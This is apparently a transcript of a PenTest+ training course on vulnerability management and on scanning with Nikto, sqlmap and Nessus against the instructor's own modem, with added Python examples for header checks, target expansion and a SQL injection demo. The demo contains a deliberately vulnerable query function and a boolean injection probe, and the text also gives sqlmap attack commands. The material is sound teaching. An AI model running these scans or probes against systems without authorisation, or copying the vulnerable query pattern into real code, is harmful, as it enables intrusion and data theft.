vulnerabilities in other information systems, that is, systemic weaknesses or deficiencies. So once vulnerabilities are found, they must be shared with other departments to prevent the same thing from happening elsewhere.

Now, once you determine whether the pen test is to be executed in a regulated environment, as a pen tester you have
to define what to do next. Say it is a federal government institution, so it falls under the regulation defined by FISMA: you know there is a periodicity that must be respected, and you know you must scan again once vulnerabilities are found, but that is all theoretical. What are you supposed to do before you actually deploy the pen test? First of all, more technically, identify the targets: what am I going to scan? The entire network, particular applications, a specific node? Identify the techniques, which relates closely to what FISMA establishes: which tools and which types of scan will be executed, a SYN scan, a passive scan, an active scan, and which tool for which purpose. You also have to define the frequency, in case it is not PCI DSS, because PCI DSS already establishes one; even then, the company does not have to stick to a quarterly scan, it can run one every month. The quarterly cadence defined by PCI DSS is the longest window the company may go without a scan, and it can shorten that window. If it is not PCI DSS and the company wants to set its vulnerability scan policy, or vulnerability management policy, to a specific frequency, it can and it should.

You must also remember, as a pen tester, that everything must be described in the statement of work: the pen tester cannot decide anything on their own without describing and documenting that procedure. Once the vulnerability management policy has been established, the company and the pen tester must also establish the workflow. Obviously this is agreed between the company and the pen tester, so they must do it together. First, testing is executed. Did it detect anything? If there is any finding that requires remediation, it must be remediated, and once those vulnerabilities are fixed, or at least believed to be fixed, testing must be executed once again. One detail: I said the company and the pen tester determine that the vulnerabilities have been fixed, but it is only the company. The pen tester does the testing and the detection, writes the report and presents it to the responsible person or staff; the company is responsible for remediating those flaws. Once they are fixed, the company calls the pen tester back to start over, running the tests and detection once again. That is how vulnerability management must be executed in general, and remember that the company has to identify whether it must be compliant with any of those regulations and adjust its vulnerability management accordingly. In our next video we move to a more technical implementation, where we actually see how to execute vulnerability scans using a piece of software called Nessus. I hope you
enjoyed this class thank you very much hello welcome to the second video of our fourth module module four where we're starting to analyze vulnerabilities so first we discussed vulnerability management so which is a phase where some theoretical actions must be planned now we're going to jump into the actual vulnerability scanning task and to do this we're gonna see three different tools so there are different ways of scanning for vulnerabilities you can search for for example um SQL vulnerabilities or try to find vulnerabilities in databases you can try to find vulnerabilities in web applications in a
standalone applications client server applications so all different types of even operating systems so all different kinds of resources may have vulnerabilities that is why you have such a broad number of tools in order to scan for vulnerabilities so we're gonna take a brief look at two specific tools one is nicto so nickto and we write it this way is a tool that we use to scan for web applications vulnerabilities it can be a vulnerability in the web application in the website for example or also in the server the web server but it's focused on the
HTTP and https protocols then we're going to take a look at another tool that is focused on finding vulnerabilities in databases specifically in SQL databases in relational databases which is the SQL map tool and lastly but not less important or probably most important is the nasus tool now we must keep in mind that there are a like I said there is a very broad number of tools to do the very same thing it depends on which ones you find more interesting or more suitable to your scenario okay so for example let's say that you don't
want to use NASA's because NASA's has different versions and to use NASA's in a productive environment you have to purchase the their Enterprise one of their Enterprise Solutions and they have different solutions um okay so you're looking for an open source and free vulnerability scanner okay so you can try openvas open Vas that's another very good solution so it will very depending on your your needs okay okay so first let's start with nikto and I have my kala Linux instance running here Kali Linux already comes in case you installed it with a graphical environment at
least, already comes with Nikto. So here's what I'm going to do: I'm going to run Nikto against my modem. Okay, so the reason why I'm going to run it against my modem is because I don't want to run it against a production web server, for many reasons. As you are aware by now, you should only run any of these pen testing tools against servers or devices whose owner, the person or the company that is responsible for those devices, is aware of your actions. So you cannot randomly pick a server that is publicly available and do it; well, technically speaking you can, but you can get in trouble if you do that. So please make sure that whenever you're using these tools to learn, create your own environment, use devices that you control, or at least make sure that the person or the company that manages those devices is aware of your tests. Okay, so as you can see, the simplest way to use Nikto is actually very simple: simply use nikto -host and then the web server that you have. In this case my modem
has IP address 10.0.2.2. I run it and then it will start to scan that web application and web server. Okay, right off the bat we can see some very important stuff here. It's just a modem, a residential modem, so obviously the manufacturers' concern while building these residential modems is not security; they're not very much concerned about security, so obviously we're going to find many flaws, or at least minor vulnerabilities, here that should be addressed. Okay, so it's going to find a bunch. I'm not going to go through all of them; I recommend you go through everything that you see when you run your own, but let's just briefly go through some of these here. First of all we can see that's my target IP, that's the hostname (there is no hostname), that's the port, and when it started. Then it will show the version; it will try to enumerate the version of the web server. Okay, so it's running Apache 2.4.41. Right off the bat, that's one problem right there, and when we're running Nessus we're actually going to
see a full report about this. Okay, so Apache versions should be higher than 2.4.46. The anti-clickjacking X-Frame-Options header is not present; it should be. The cross-site scripting protection X-XSS-Protection header is not defined; this header can hint to the user agent to protect against some forms of cross-site scripting. So basically it's saying, hey, this is not defined but it should be. Another one: the X-Content-Type-Options header is not set. This could allow the user agent, which is the attacker, to render the content of the site in a different fashion to the MIME type, which means that the attacker can gather more content than is supposed to be made available. The Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. That is a problem there, and there is a link there that will give you more information about that. The following alternatives for index were found: so you can see multiple languages available, index files with different languages available. Multiple index files found; there is a problem. Why is there a problem? Well, if you have two
index files, probably just one index file is supposed to be made available, so the other one shouldn't exist. If it exists, it can give more information to the attacker, information that is not supposed to be available. Keep that in mind: from a security analyst's standpoint, only information that is supposed to be available should be available, no more than that. And then we have so much more debug output available here. Now, out of 7889 requests, as you can see right here, zero errors and 10 items reported on remote host. So there was no error, but there were 10 items reported. What does that mean? It means that the server and the web applications that it runs don't have a critical vulnerability, but there are some reports, or report items, that should be addressed. Then it can ask for your interaction. Okay, so in this case it's asking: portions of this server's headers, as you can see, are not in the Nikto 2.1.6 database or newer than the known string. Would you
like to submit this information to CIRT.net for a Nikto update? So basically what it's saying is, hey, there is something here that could be addressed, but there are no plugins, at least in this version's database, that could address this problem or this anomaly. Would you like to report it? Because if you report it, then the Nikto guys could include those plugins into their database. So no, I don't want to do that, and we are done. Okay, so that's Nikto. There is a bunch of other options that you can use along with Nikto. I'm not going to go through all those options, but it's always interesting and important to actually know that you can enhance the way that you use a tool. Okay, so for example, let's say that you are checking a web application that connects to a database, right? You can specify some database-specific options such as -dbcheck, and there are so many others here. For example, let's say that you know the database name, or you want to try to guess the database name; there are options here that will help you address that database. Okay, so it's always important to take a look at the options that you have available, which may improve not only your pen testing task but also the performance of your pen testing task. Keep in mind this can be a very, very long task; the execution may take a very long time. I ran it against just a modem; if you run it against a production environment, a production web application that is calling other websites and other applications, this can take a very, very long time. Okay.
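The findings Nikto reported above (missing X-Frame-Options, X-XSS-Protection and X-Content-Type-Options headers, and a disclosed Apache version below 2.4.46) come down to a few checks on one HTTP response. The following Python is an added example, not code from the course or from Nikto: it runs those checks on a plain header dict, such as the one any HTTP client hands back. The two header sets are constructed, one resembling the modem's response and one a hardened server, and the 2.4.46 floor is the one stated in the lesson.

```python
"""Header and version checks of the kind Nikto reported, run on a captured response.

Added example for this lesson; not code from the course or from Nikto.
"""
import re

# The three headers Nikto reported as missing, with the problem each gap creates.
EXPECTED_HEADERS = {
    "X-Frame-Options": "anti-clickjacking header is not present",
    "X-XSS-Protection": "XSS protection header is not defined",
    "X-Content-Type-Options": "header is not set, so the browser may sniff the MIME type",
}

# Minimum Apache httpd version the lesson treats as acceptable.
APACHE_MIN_VERSION = (2, 4, 46)


def parse_apache_version(server_header):
    """Return (major, minor, patch) from a banner such as 'Apache/2.4.41 (Unix)',
    or None when the banner discloses no version (the desired state)."""
    match = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", server_header or "")
    return tuple(int(part) for part in match.groups()) if match else None


def audit_response_headers(headers):
    """Return a list of finding strings for one response's headers.

    `headers` is a plain dict; lookups are case-insensitive because HTTP header
    names are. An empty list means none of the checks fired."""
    present = {name.lower(): value for name, value in headers.items()}
    findings = []

    for name, problem in EXPECTED_HEADERS.items():
        if name.lower() not in present:
            findings.append(f"{name}: {problem}")

    # Present but with a useless value is a finding too.
    xcto = present.get("x-content-type-options")
    if xcto is not None and xcto.strip().lower() != "nosniff":
        findings.append(f"X-Content-Type-Options: value {xcto!r} should be 'nosniff'")

    version = parse_apache_version(present.get("server"))
    if version is not None and version < APACHE_MIN_VERSION:
        findings.append(
            "Server: Apache %s disclosed, below %s"
            % (".".join(map(str, version)), ".".join(map(str, APACHE_MIN_VERSION)))
        )
    return findings


# Constructed headers resembling the modem's response: version banner, no hardening headers.
MODEM_HEADERS = {
    "Server": "Apache/2.4.41 (Unix)",
    "Content-Type": "text/html",
}

# Constructed headers for a hardened server: version hidden, all three headers set.
HARDENED_HEADERS = {
    "Server": "Apache",
    "Content-Type": "text/html",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "0",
}


if __name__ == "__main__":
    for label, hdrs in (("modem", MODEM_HEADERS), ("hardened", HARDENED_HEADERS)):
        found = audit_response_headers(hdrs)
        print(f"{label}: {len(found)} finding(s)")
        for line in found:
            print("  -", line)
```

Run as a script it prints four findings for the modem-like headers and none for the hardened set. The version check only fires when a version is actually disclosed: a bare `Server: Apache` banner is what you want the server to send, and it produces no finding.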
Now, the sqlmap tool: basically, that's how you use it. I won't get a successful execution against my modem, because it actually doesn't have a SQL database, but if you have a SQL database and you want to take a look at the output, this is the simplest way to run it: sqlmap -u, to specify the URL of your target. Okay, now in many situations, as you can see in this output here, it may say, hey, you're trying to scan this website here, or this database management system, through a web application, right? So if it's a web application, you're supposed to inform a parameter that we can use in order to connect to the database. This may be a little bit confusing right now, but we're going to discuss this in detail when we get to the web application vulnerability module; we're going to have a module that will focus specifically on, for example, SQL injections. Okay, so when you're directly connecting to the database, you can use sqlmap and say, hey, sqlmap, connect to that DBMS, database management system, and it will do it. When you're connecting to a website, a web application that connects to the database, then you have to inform the parameters that will be used in order to connect to that database through the web application. If you try, for example, this option right here and it doesn't work, but you know that website has forms, this is what you can do: sqlmap --forms -u and the target. It will randomly generate information to fill in those forms, and by filling in those forms it will pass the parameters that are required to connect to the database through the web application.
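To see why sqlmap needs a request parameter when it goes through a web application rather than straight to the DBMS, here is the defect it probes for, side by side with the fix, on an in-memory SQLite database. This is an added example, not the course's code nor sqlmap's; the users table, its three rows and the probe string are constructed for the illustration.

```python
"""The injection a scanner tests a request parameter for, shown against SQLite.

Added example for this lesson; not code from the course or from sqlmap.
The table, its rows and the probe string are constructed.
"""
import sqlite3


def make_db():
    """Build an in-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name, email) VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"),
         (2, "bob", "bob@example.test"),
         (3, "carol", "carol@example.test")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Handler that splices the request parameter into the SQL text.

    This is the defect a scanner looks for: the parameter value can change the
    query's logic, so one HTTP parameter becomes a path to the whole table."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Same lookup with a bound parameter: the driver sends the value separately
    from the SQL text, so it can never be parsed as SQL."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# A boolean-logic probe of the kind scanners send to see whether the parameter
# alters the query. Constructed for this example.
PROBE = "x' OR '1'='1"


def compare(probe=PROBE):
    """Return how many rows each handler returns for the probe, plus a normal lookup."""
    conn = make_db()
    try:
        return {
            "vulnerable_rows": len(lookup_vulnerable(conn, probe)),
            "parameterized_rows": len(lookup_parameterized(conn, probe)),
            "normal_rows": len(lookup_parameterized(conn, "alice")),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

The concatenating handler returns every row for the probe, which is exactly the behaviour a scanner detects by comparing responses; the bound-parameter version returns nothing, because the database received the probe as a value and never as SQL text. That one change is also what makes the scanner's injection test on that parameter come back negative.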
So this is just another way of running it. Again, it's not the case; my modem doesn't have a SQL DBMS. Okay, now moving forward, we also have another application that is very, very interesting and very powerful, which is Nessus. So currently Nessus is the most adopted, well-known vulnerability scanner in the market. Now how does Nessus work? Basically what it does is to actually perform attacks, and how does it perform those attacks? By using a bunch of different plugins, and you're going to have an idea of how many plugins we have. So basically a plugin is a script that will perform an attack in order to check whether that vulnerability is available or not. So you can have a plugin that will try to detect a specific vulnerability; you can have a plugin that will detect many different vulnerabilities. Okay, so that's basically how it works. It's a client-server application, it's a web application, and you have two different options: one is you run it as a web application, or you run it as a network service. If you run it as a network service, you're going to have to have the network client in order to connect to the Nessus server and issue a vulnerability scan or a network scan. So it's a lot easier to just run it as a web application, because then you just have to have access to a browser, and from that browser, it doesn't matter where you are, you can connect to your Nessus web application and configure your scan and also start the scan, execute the scan. So Nessus is a tool designed by Tenable, and that's their
website, tenable.com. If you come here you're going to see Products, and nowadays they have so many different products. Okay, and this is the one that we're going to look at: Nessus. I'm going to click here. Now once again I strongly recommend you to try it, okay? Not only watch the video but also do it; you're going to understand it a lot better and you're going to learn a lot more. By the way, Nessus is a tool that is covered by the CompTIA PenTest+ exam; you're certainly going to see it there. Also, this is a tool that will be used by us once again in our next module, module five, in order to interpret and analyze vulnerabilities. Okay, so here you can see some different versions of Nessus, and this is the one that we're going to download: Nessus Essentials. So obviously it has its limitations, okay: ideal for educators, students and individuals starting their careers in cyber security. So that's the one you're going to click on, Download. It's going to ask for your first name, last name and email; actually you're only going to use this to receive an email with the activation code. As you can see right here, you need an activation code in order to run Nessus, even Nessus Essentials, which is free. Okay, so once you fill this out you click Register; it will take you to a web page that will give you different options to download Nessus. You're going to select the version according to your distribution. Okay, so let's say that you have Kali Linux, as I have right here; you're going to see a version of Nessus for Kali Linux. Okay, so you download it here. When I downloaded it,
it went to my Downloads folder inside my home directory. Okay, you're going to get the activation code in your email. Now here, all you have to do is a dpkg, in case you're running Kali Linux, Debian, Ubuntu, these Debian-like distributions: dpkg -i Downloads/ followed by the file that you downloaded, the .deb file, the Nessus .deb file. Okay, I already have it; it's a very quick process. Okay, once it's done you have to start the Nessus service, and once again it will depend on your distribution. If you're using Kali Linux, more recent CentOS distributions, Debian distributions, you're going to do sudo systemctl start nessusd. Okay, because you're using sudo, you're running it as an administrator user, so it will ask for your password. Okay, so no error here. If you want to make sure that Nessus is now running, you can do ps aux | grep nessus, and there it is. Now something interesting that I want you to see, so you can get an idea of how many plugins we have: I'm going to run, with sudo, a disk usage check in the /opt/nessus directory, and there you go. So we have more than seven gig of data in the Nessus directory; most of this amount of data is Nessus plugins. Now remember, a plugin is a script, and a script is nothing more than one small text file. Well, it can be a binary file, but it's a very small file; usually it doesn't even have a meg, right? It's just maybe not even a K, very small files. So you can get an idea of how many files you have there. Okay,
once you have Nessus installed and running, you're going to go back to your browser and you're going to access https; you have to specify HTTPS, it's not HTTP. Okay, so https://, your machine name, or you can use localhost if you want, that's also fine, :8834; that's the port that Nessus runs its web application on. Okay, once you do it, the first time that you run Nessus it will ask some simple questions. First of all, it will ask for the version of Nessus that you are willing to run, because although you downloaded Nessus Essentials, when you run it, it will ask you, hey, do you want to run, let's say, Nessus Professional? If you do, we're going to load more plugins. Okay, because the only difference between all these different Nessus versions is basically the access to additional resources and additional plugins; obviously, if you pick a version different from Essentials, you're going to have to pay for the activation code. Okay, once you click okay, I want to use Nessus Essentials, it will once again ask for your first name, last name and email. Okay, but you already have your activation code, so you're going to see a button that says Skip. So you can click Skip, and then it will take you to another page that will ask for your activation code. You insert the activation code there, you continue, and then it will start to download and compile the plugins. Now this is a very, very important piece of information, okay: to download and compile and then load all those plugins, Nessus requires a bunch of resources, RAM, CPU and storage. As you saw, storage almost 8 gig, and RAM,
it also requires a bunch of RAM. So why is this information important? Because Nessus doesn't debug problems while you're compiling those plugins. So let's say that you run out of RAM; it will start using the swap memory, but it will start running so slow that Nessus will go back and start compiling and loading the plugins once again from scratch, from the beginning, and it will keep doing that. So let's say that it starts over, goes all the way to half of the plugins, there is not enough resources, it goes back to the beginning, and it just keeps doing that in a loop, and you're like, okay, why is it taking so long? So that's why: make sure that your machine has at least four gig of RAM, at least four gig of RAM, and more than 10 gig of storage available. Okay, once the plugins have been compiled and loaded it will ask for your user, and you can define any username with any password. I have here nessus with password nessus, and you sign in. Okay, good. Now the first time that you log in, first of all, it will automatically create this scan called My Host Discovery Scan. So that's a feature that Nessus has, okay: it will run a host discovery in your network, it will try to find other hosts, of course the own machine that is running Nessus, and also other hosts within that same network. Okay, but it will basically just do a simplistic scan against those hosts, and what you actually should do is create your own scan, as I did over here. Okay, and this
is a scan that I executed already, but before we take a look at the result of that scan, let's see how we can actually create those scans. Okay, so the first time that you log into Nessus, this is the page that you're going to see, My Scans; it will either have My Host Discovery Scan here or it will be empty. Okay, and then you have to configure how you want to run the Nessus scans. Now how can you do it? You have a few options here, okay. First of all, if you go here to Policies, and this is what is most important, okay, in Policies you have templates. What are these templates? Templates are different types of scans that have been previously created to facilitate our life. So let's say that you want to run a scan; you have two options: you're not absolutely positive about what you want to do, or you know for a fact that you want to run a very specific scan. Okay, so if you're not positive about what you want to do, you can start by running a Basic Network Scan, okay, just scan your network. Okay, it's different from a Host Discovery: Host Discovery will only, as it says here, do a simple scan to discover live hosts and open ports, but there is no vulnerability scan. If you want to run a basic vulnerability scan, you can pick this option here, a full system scan suitable for any host, so it's a generic vulnerability scan. If you want to run a very specific scan, then you have all these different options here. So Malware Scan: scan for malware on Windows and Unix systems. Mobile Device Scan: assess
mobile devices via Microsoft Exchange or an MDM. Web Application Tests, this is a very resourceful and useful one. Credentialed Patch Audit, okay, so there is a concept called credentialed scan and non-credentialed, or uncredentialed, scan. Okay, what is the difference? An uncredentialed scan is a scan that you're going to run when you don't have authentication credentials information. Okay, so usually in a black box methodology, in a black box pen test, you're going to run an uncredentialed scan, unless during your scans you are able to find some credentials. If you have access to credentials, let's say that you're running a white box scan, okay, so your client or your boss provided you with some credentials, then you're going to run a credentialed scan. Okay, so in this case you can run a Credentialed Patch Audit: authenticate to hosts and enumerate missing updates. So keep in mind this is not actually an attempt to exploit vulnerabilities; you are basically using the authentication, the credentials that you have, to enumerate missing updates. So basically you're using user and password to be allowed to connect to the services or applications to check whether those applications need to be updated. Badlock Detection, Bash Shellshock Detection, DROWN Detection, Intel AMT Security Bypass, Shadow Brokers Scan, Spectre and Meltdown, WannaCry Ransomware. So what do we have in common for all of these detections and ransomware around here, from this one all the way down to this one? Remote and local checks for CVE-2016-2118, CVE-2014-6271. So what specifically is this CVE? CVE stands for Common Vulnerabilities and Exposures. Every time that a vulnerability is detected, ideally, if it's a new vulnerability that no one has
ever seen and has not been reported, you're supposed to report it. That vulnerability will be addressed, and if it is an actual vulnerability, a CVE, a specific number, a part number, will be assigned to that vulnerability. Why? Because we want to have a unique identification for each vulnerability, so that companies that design software know what type of vulnerability should be addressed. So for example, if you run the Bash Shellshock Detection, which performs remote and local checks for those two different CVEs, you know that it is a very specific vulnerability that is being addressed. What are those two vulnerabilities? Those are the vulnerabilities associated with the Bash Shellshock attack, okay, and in our next module, module five, we're actually going to see how to analyze these CVEs. Okay, now down here, as we previously mentioned on several occasions, you also have compliance, okay. So you have scans to check if your system is compliant, or your client's systems and devices are compliant, with some compliance acts. Okay, so Audit Cloud Infrastructure; Internal PCI Network Scan: perform an internal PCI DSS vulnerability scan according to PCI DSS 11.2.1, okay, and some others here. Now here we have the PCI Quarterly External Scan, approved for quarterly external scanning as required by PCI, which is very, very helpful, because basically, to perform the PCI quarterly external scan for your client, in case you're being hired by your client, this is all you have to do in regards to the quarterly external scan. Okay, now in order to use these you need an upgrade; you cannot use Nessus Essentials. Okay, but what if I don't want to use any of these? I want to customize my own scan. Okay, very good, so what you can do is go here to Advanced Scan: configure a scan without using any recommendations. So I'm going to go there. Okay, now you've been taken to a new scan, okay, so from the plugin, oh I'm sorry, from Policies you've been taken to your scans to create a new scan. Okay, and you have so many different options here. First of all, Settings: you have different types of settings that you can configure here, some basic information. You can name it; actually you have to name your scan. You
can just give a text description, in which folder you want to store it, and you can list your targets. As you can see, it could be a specific IP; if you have more than one IP address you can use a comma to separate those IP addresses; you can use the CIDR notation; you can use domain names; you can use a range, so for example, I believe you can see, ranging from 192.168.1.1-192…; or, if you have a file listing the IP addresses, and it must be one source IP, domain name, network range, whatever, one per line in a text file, you can add that text file here. You can schedule this execution, okay, it's not enabled, but you can. Notifications: so once it's done, every time the scan is done you want to notify someone, maybe yourself, so you can define it here. Okay, and many other setups that you can define here.
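The target syntaxes just listed (a single IP, comma-separated entries, CIDR notation, a first-last range, domain names, and a text file with one entry per line) can be expanded into the actual host list before you press Launch, which is a quick way to see how big a scan you are about to run and to catch a typo before it costs you hours. The Python below is an added example, not Tenable's code; the sample target string is constructed and modem.lan is a made-up hostname.

```python
"""Expand a Nessus-style target list into individual targets.

Added example for this lesson; not code from Nessus or Tenable. It accepts the
syntaxes the lesson lists: one IP, comma-separated entries, CIDR notation,
a range written first-last, hostnames, and a file with one entry per line.
"""
import ipaddress
import re

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)
# Refuse to expand anything wider than this so a typo in a prefix cannot
# turn into a scan of millions of addresses.
MAX_EXPANSION = 65536


def expand_entry(entry):
    """Yield every target one entry stands for; raise ValueError when malformed."""
    entry = entry.strip()
    if not entry:
        return
    if "/" in entry:
        # CIDR block; strict=False lets 10.0.2.7/24 mean the /24 that contains it.
        net = ipaddress.ip_network(entry, strict=False)
        if net.num_addresses > MAX_EXPANSION:
            raise ValueError(f"{entry}: block too large to expand")
        # /31 and /32 have no network or broadcast address to skip.
        addrs = net.hosts() if net.prefixlen < net.max_prefixlen - 1 else net
        for ip in addrs:
            yield str(ip)
        return
    if "-" in entry and entry.replace(".", "").replace("-", "").isdigit():
        # first-last range of IPv4 addresses
        first, last = entry.split("-", 1)
        start, end = ipaddress.ip_address(first), ipaddress.ip_address(last)
        if end < start:
            raise ValueError(f"{entry}: range end precedes start")
        if int(end) - int(start) + 1 > MAX_EXPANSION:
            raise ValueError(f"{entry}: range too large to expand")
        for value in range(int(start), int(end) + 1):
            yield str(ipaddress.ip_address(value))
        return
    if re.fullmatch(r"[0-9.]+", entry):
        # Looks like an IPv4 address, so it must parse as one (300.1.1.1 is rejected).
        yield str(ipaddress.ip_address(entry))
        return
    if HOSTNAME_RE.match(entry):
        yield entry
        return
    raise ValueError(f"{entry}: not an IP, CIDR, range or hostname")


def check_targets(text):
    """Expand the target box contents or a one-entry-per-line file into
    (targets, errors). Entries may be separated by commas or newlines;
    duplicates are dropped while the original order is kept, and malformed
    entries are collected rather than raised so all of them get reported."""
    seen = set()
    targets, errors = [], []
    for entry in re.split(r"[,\n]", text):
        try:
            for target in expand_entry(entry):
                if target not in seen:
                    seen.add(target)
                    targets.append(target)
        except ValueError as exc:
            errors.append(str(exc))
    return targets, errors


def expand_targets(text):
    """Like check_targets, but refuse the whole list if any entry is malformed."""
    targets, errors = check_targets(text)
    if errors:
        raise ValueError("; ".join(errors))
    return targets


def expand_targets_file(path):
    """Expand a target file of the kind the lesson describes: one entry per line."""
    with open(path, encoding="utf-8") as handle:
        return expand_targets(handle.read())


# Constructed sample mixing every syntax; modem.lan is a made-up hostname.
SAMPLE_TARGETS = "127.0.0.1, 10.0.2.2, 192.168.1.0/30, 192.168.1.1-192.168.1.4, modem.lan"


if __name__ == "__main__":
    for target in expand_targets(SAMPLE_TARGETS):
        print(target)
```

The sample expands to seven targets: the /30 contributes its two usable hosts, the range adds the two addresses the block did not already cover, and the hostname passes through unchanged for the scanner to resolve. The `MAX_EXPANSION` guard is a deliberate choice for a pre-flight check; a real scanner will happily accept a /8, which is exactly why you want to see the count first.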
Okay, now also very important: if some types of scans require credentials, then you can define those here. For example, during a host scan, in case it's a Windows host, okay, so you can define your domain name and username and password here; if it's an SSH authentication; if it's a host with SNMP version 3 enabled, you can also define it here. Obviously you have to have these credentials, but the idea here is, okay, I do have the credentials, I want to connect using those protocols and authenticate in order to retrieve information, right? So once again, it depends whether you're performing a white box pen test, or in case you're performing a black box pen test, you have to have acquired those credentials previously. Okay, and now, oh I'm sorry, so you also have other categories; for example, if you want to scan a host that has a database and you have credentials to that DBMS, then you can inform it here. Okay, so what is the database type? Okay, is it MySQL, is it Oracle, what is it? Now moving to Plugins: when you go to your personalized, customized scan, all plugins will be enabled. Now you should not do it, because first of all it will take a very, very long time, and second, you're going to run so many unnecessary plugins, right? So for example, the first one that we see here is AIX Local Security Checks. Well, if our system is not AIX, why would you run it? So I'm going to click here; it's enabled, I'm going to click here on Disabled and disable it. Okay, now automatically you can see that all those plugins associated with that family of plugins have been disabled. Now observe here that we have the plugin families here; you see how many families we have. A
family is composed of a set of plugins; for example, the AIX Local Security Checks family has 11,377 plugins. If we go here and click on a specific plugin, you're going to see a description of that plugin. So what does this AIX 5.1 ay19744 plugin do? Synopsis: the remote host is missing a vendor-supplied security patch. Description: it says what it does, how to solve that problem, and more information about that plugin, and the risk factor, which we're going to discuss in our next module, is high. Okay, so let's say that you have this family here enabled; you can disable some specific plugins and leave others enabled, and it changes to Mixed because we have some that are disabled and others that are enabled. Okay, but I'm going to disable it. So you should go here and enable or disable accordingly, okay, depending on your targets. Now once it's done, you click on Save. Okay, I already have my own one; I previously created one here called CompTIA PenTest+ vulnerability scan, okay, and I executed it. So I created one that scans two hosts, as you can see here: my own Kali Linux machine and my modem. Okay, so 127.0.0.1, that's the localhost, and 10.0.2.2, that's my modem. Okay, so I'm going to go back here. In order to launch a scan, you click on the scan that you created and then you're going to see here Launch. Okay, it can take a while, it can be quick, it depends on the number of plugins. Okay, every time you run it you're going to see the result, so my history here, there it is; it's been canceled, it was executed today, last modified today, and
let's see what we were able to find. Oh, I guess I clicked on the wrong one, I'm sorry, so it's this one right here. Okay, so 127.0.0.1: one medium vulnerability, 34 are just info. Okay, now my modem, 10.0.2.2: one high, one medium, one low, 28 info. Let's take a look at this. So let's go here to Vulnerabilities, okay, and there is one here that is Mixed. What does that mean? It means that two vulnerabilities associated with the Apache httpd server, the web server, were found. Let's take a look at those. Okay, so one is medium, the other one is high. What is the problem of that vulnerability, or at least its name? Apache 2.4.x lower than 2.4.46, that's high, and another one is lower than 2.4.42. Well, that's because of the Apache version that is running, okay, so let's go there, click on High. So the Apache version that is running is below 2.4.42, because it's 2.4.41. Okay, now what's the problem? The version of Apache HTTP installed on the remote host is prior to 2.4.44; it is therefore affected by multiple vulnerabilities as referenced in the 2.4.46 advisory. Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE, which is associated with this Common Vulnerabilities and Exposures part number right here. In the next module we're going to learn how to analyze this. Okay, so there is a description here, and basically if you scroll down you have a bunch of other information here explaining how critical this is, and then you have a solution right here: what do I do? You upgrade to Apache version 2.4.44 or later. Okay, so installed version 2.4.41, fixed version 2.4.46.
Okay, we also have a bunch of other information here on the right-hand side, okay, some more details about the plugin, the plugin that actually detected that vulnerability, and risk information. This is what our next module basically will be focusing on understanding, okay. So risk factor: High. Who determines if it's info, low, medium or high? Okay, so it's high because of the CVSS base score, which is 9.8. Okay, what is the range of that score? Okay, now what is the CVSS vector? Here we have a bunch of information; each of these data items between these slashes is specific information; we're also going to learn that. Okay, some additional vulnerability information right there, and links to the CVE or CVEs associated with that vulnerability are down here. So this is how you run Nessus; that's how you configure and launch vulnerability scans. Once again, in our next module we're going to focus on understanding and interpreting this data right here. I hope you enjoyed this class, thank you very much. Hello, welcome to module 5, and our focus in this module is going to be analyzing vulnerability reports.
So we saw in our previous module, in module 4, how to run different types of vulnerability scans. Now the task, or tasks, of a pen tester is to not only run vulnerability scans but also to analyze the result. You see, there are some steps that must be followed, or at least executed, by a pen tester, and out of those steps we have: run a vulnerability scan. But not only that; as pen testers we have to also verify whether those vulnerabilities actually exist or not, if they actually work. What does that mean? This means that once we find a vulnerability, of course there are some vulnerabilities that are very rough, they are dangerous, so just by knowing that they exist there's nothing else that you need to do in regards to it, but there are other vulnerabilities that must be exploited. So for example, let's say that you are pen testing a client's network and you found out that the client has a number of Windows workstations. Well, usually a Windows workstation is not that important in regards to the data that it contains; however, this can be an entry point to other spots, other locations or other devices of your network. This means that if you find a specific vulnerability in a Windows workstation that you can leverage to gain control of it, and from there get access to other devices, or simply to sniff data that is being transmitted through that network, then you're not only going to see that that vulnerability exists, but you also have to make use of that vulnerability. So this leads us to this module here, analyzing the report; that's one reason
why you have to do it. The other reason, which is more important on the client's side or on your boss's side, is analyzing, out of all the vulnerabilities that were found, in case vulnerabilities exist, let's say that there are maybe 20, 25 vulnerabilities, in which order the IT staff is going to assess those vulnerabilities or fix those vulnerabilities. There must be a schedule, and that schedule must go along with the criticality of those vulnerabilities. So that is why it's so important to analyze the vulnerabilities, and that is why we have what is called the CVSS, and we're going to discuss that: the CVSS base score. It helps us identify the vulnerabilities that are more critical than others. Okay, so a vulnerability report, obviously it will depend on the vulnerability scanner that you're running, but in general all of them, they may use different names, but all of them will have the same information here. First of all, a summary of the vulnerability, just a name, for example, or a brief description. It will also present a detailed description, so it's actually telling you, hey, this vulnerability here is critical because of this, this and that. It can show you how to fix it, or at least give you a link with a URL showing you how to solve that problem. The output that's been sent by the machine or software that's being compromised, or at least that hosts that vulnerability: so for example, let's say that we're using Nessus; when Nessus runs the scripting attack against a device, that device will respond, will reply in some way, so here we can see the output sent by that
